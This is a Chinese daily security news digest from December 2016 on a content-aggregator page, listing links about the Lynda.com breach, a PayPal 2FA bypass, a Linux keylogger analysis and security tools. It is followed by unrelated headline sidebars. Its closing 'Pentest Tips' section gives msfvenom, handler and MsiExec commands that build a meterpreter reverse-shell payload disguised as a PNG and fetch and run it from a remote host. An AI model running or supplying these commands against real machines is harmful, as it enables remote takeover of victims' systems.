Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

12月19日 - 每日安全知识热点

December 19, 2016, 6:44 am
$
0
0

12月19日 - 每日安全知识热点

热点概要:在线培训网站Lynda.com数据泄露、paypal双因子绕过漏洞细节、MiKey - 分析一款linux下的键盘记录软件、对Naenara Browser 3.5 exploit的预览

国内热词(以下内容部分摘自http://www.cnbeta.com/):

偷换300多家商户收款二维码 两男子盗刷近百万元

网上回收摩拜单车开价2000元 ofo只卖99元

维基百科超过筹款目标 但继续要求捐钱

FBI、CIA指责俄罗斯为美国大选幕后黑手 奥巴马称将报复

资讯类:

Wikileaks公布德国NSA调查委员会的内部分类文件

http://electrospaces.blogspot.co.id/2016/12/wikileaks-publishes-classified.html

数据库泄露类:

在线培训网站Lynda.com数据被第三方非授权访问,官方重置55,000用户密码

http://www.theregister.co.uk/2016/12/18/linkedin_lynda_breach/

俄罗斯黑客销售美国选举援助委员会网站的权限和数据

https://www.recordedfuture.com/rasputin-eac-breach/

技术类:

paypal双因子绕过漏洞细节

http://tayyabqadir.com/2016/12/17/paypal-2fa-bypass-by-tayyab-qadir/

PowerShellArsenal:使用powershell编写的逆向模块,可以用来分析.NET恶意软件

https://github.com/mattifestation/PowerShellArsenal

Wifi-Dumper : 获取windows平台下wifi profiles中明文密码的工具

https://github.com/Viralmaniar/Wifi-Dumper

MiKey - 分析一款Linux下的键盘记录软件

http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger

使用Vshot 和 Remnux进行内存取证(第一部分)

https://cyber-ir.com/2016/12/14/memory-forensics-with-vshot-and-remnux-1/

自动寻找Ian Beer's exploit的offset(仅仅支持_kernproc / _allproc)

https://gist.github.com/jndok/2a01a5885552571a69341a9700ac1bb0

一道Qrilee出的Android Crackme

https://github.com/Qrilee/crackme

Implementing & mitigating covert channels in Dropbox

http://cygnus.tele.pw.edu.pl/~wmazurczyk/art/Dropbox-CC.pdf

给ropper增加semantic search功能

https://scoding.de/semantic-search-in-ropper

使用Mobile Partner实现本地提权

https://osandamalith.com/2014/10/20/escalating-local-privileges-using-mobile-partner/

对Naenara Browser 3.5 exploit的预览

https://www.myhackerhouse.com/naenara-browser-3-5-exploit-jackrabbit/

Pentest Tips:

在本地执行远程恶意MSI文件的方法:

1.生成payload

msfvenom -f msi -p windows/meterpreter/reverse_tcp LHOST=10.18.180.148 LPORT=4444 > meterp.png

2.在攻击者的机器上监听端口,等待肉鸡上线

msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.18.180.148 set ExitOnSession false exploit -j -z

3.肉鸡上执行

MsiExec /i http://10.18.180.148:88/meterp.png /q
12月19日 - 每日安全知识热点
12月19日 - 每日安全知识热点

本文由 安全客 原创发布,如需转载请注明来源及本文地址。

本文地址:http://bobao.360.cn/news/detail/3847.html

Search
Viewing all articles
Browse latest Browse all 12749

Latest Images

經濟委員會通過《遠洋漁業條例》修正條文 有望杜絕非法漁獲上餐桌

經濟委員會通過《遠洋漁業條例》修正條文 有望杜絕非法漁獲上餐桌

April 15, 2024, 1:34 am
重電股回檔整理 士電大股東國賓強漲7%、股價寫近30年新高

重電股回檔整理 士電大股東國賓強漲7%、股價寫近30年新高

April 15, 2024, 12:41 am
获刑14年的“恶俗维基案”牛腾宇在山西读书的13岁弟弟遭不明身份人尾随

获刑14年的“恶俗维基案”牛腾宇在山西读书的13岁弟弟遭不明身份人尾随

April 14, 2024, 8:51 pm
海尼根台灣年度企劃 首發春遊小物應援你的下班生活

海尼根台灣年度企劃 首發春遊小物應援你的下班生活

April 14, 2024, 7:32 am
LCK春季決賽五場打滿!Gen.G延續王朝擊敗T1奪冠

LCK春季決賽五場打滿!Gen.G延續王朝擊敗T1奪冠

April 14, 2024, 4:10 am
作聯香港文學館6月落戶茂羅街7號

作聯香港文學館6月落戶茂羅街7號

April 13, 2024, 10:55 pm
【微博精粹】马英九反噬习近平:两岸炎黄子孙同属中华民国

【微博精粹】马英九反噬习近平:两岸炎黄子孙同属中华民国

April 13, 2024, 6:12 pm

"飞利浦健康生活Lab"携创新产品亮相第四届中国国际消费品博览会

April 13, 2024, 6:00 pm
金融時報:美生產AI晶片拼圖未齊 台積電先進製程難赴美

金融時報:美生產AI晶片拼圖未齊 台積電先進製程難赴美

April 12, 2024, 10:22 am
科幻美劇《Heroes》宣佈推出續作 新主角新反派登場

科幻美劇《Heroes》宣佈推出續作 新主角新反派登場

April 12, 2024, 7:00 am

Trending Articles

【信用卡攻略】7大高薪人仕必備 尊尚信用卡

October 12, 2017, 7:00 pm

【中文 - 答案】《放鳥》吳德功 (齊全的網絡筆記匯集) (附《新高中綜合中國語文》試卷庫 單元三(鞏固) 試卷一 閱讀能力)

December 24, 2013, 9:22 am

出售: DANMAX DM-SUB 75B 75B 6寸單元 (細隻)

April 22, 2018, 6:33 am

萬元手機的色準要求 moto g82 5G 開箱 + 螢幕量測數值分享

July 5, 2022, 9:30 pm

宜兴紫砂一厂-九头紫砂茶具-竹报春

March 9, 2020, 10:41 pm

平鎮鴻灃RICH建案討論區

March 11, 2020, 9:56 pm

[分享] GranEnde

March 20, 2016, 6:44 pm

[分享]LISP增量編碼程式

September 18, 2018, 4:57 pm

告發片商強迫拍AV? SOD「最強新人」竹内乃愛作品被刪光

February 18, 2018, 5:41 am

2246xt量产失败

January 11, 2019, 7:25 am

奔跑吧薔薇線上看 第109集

May 18, 2015, 10:49 am

EFI/UEFI Shell 的常用命令列表 Command list

November 18, 2019, 12:20 am

暴風影音 5.0.6 - 直接從電腦傳影片到iPhone上播放 [iPhone/iPad]

January 3, 2017, 4:40 pm

[3D制作类]PackMage3.0破解版免费绿色版

June 26, 2019, 2:50 pm

[評測] abee V81GH 快譯通行車紀錄器開箱@2K+HDR 前後鏡頭使用心得

June 26, 2023, 8:18 pm

請問有人知道這款安卓機的工程密碼嗎?

September 7, 2022, 6:10 am

Cocos creator 2.4.0 Android打包失败问题(已解决)

August 31, 2020, 1:52 am

习近平女儿习明泽到底长啥样?疑似真颜照片罕见流出(图集)

March 20, 2018, 1:52 pm

杂谈——桃酥的故事

November 13, 2018, 3:01 pm

臀压!鞭打!「监狱学园」S女王白木芽衣子手办强势而来

November 8, 2016, 5:34 am
More Pages to Explore .....
Search

Latest Images

經濟委員會通過《遠洋漁業條例》修正條文 有望杜絕非法漁獲上餐桌

經濟委員會通過《遠洋漁業條例》修正條文 有望杜絕非法漁獲上餐桌

April 15, 2024, 1:34 am
重電股回檔整理 士電大股東國賓強漲7%、股價寫近30年新高

重電股回檔整理 士電大股東國賓強漲7%、股價寫近30年新高

April 15, 2024, 12:41 am
获刑14年的“恶俗维基案”牛腾宇在山西读书的13岁弟弟遭不明身份人尾随

获刑14年的“恶俗维基案”牛腾宇在山西读书的13岁弟弟遭不明身份人尾随

April 14, 2024, 8:51 pm
海尼根台灣年度企劃 首發春遊小物應援你的下班生活

海尼根台灣年度企劃 首發春遊小物應援你的下班生活

April 14, 2024, 7:32 am
LCK春季決賽五場打滿!Gen.G延續王朝擊敗T1奪冠

LCK春季決賽五場打滿!Gen.G延續王朝擊敗T1奪冠

April 14, 2024, 4:10 am
作聯香港文學館6月落戶茂羅街7號

作聯香港文學館6月落戶茂羅街7號

April 13, 2024, 10:55 pm
【微博精粹】马英九反噬习近平:两岸炎黄子孙同属中华民国

【微博精粹】马英九反噬习近平:两岸炎黄子孙同属中华民国

April 13, 2024, 6:12 pm

"飞利浦健康生活Lab"携创新产品亮相第四届中国国际消费品博览会

April 13, 2024, 6:00 pm
金融時報:美生產AI晶片拼圖未齊 台積電先進製程難赴美

金融時報:美生產AI晶片拼圖未齊 台積電先進製程難赴美

April 12, 2024, 10:22 am
科幻美劇《Heroes》宣佈推出續作 新主角新反派登場

科幻美劇《Heroes》宣佈推出續作 新主角新反派登場

April 12, 2024, 7:00 am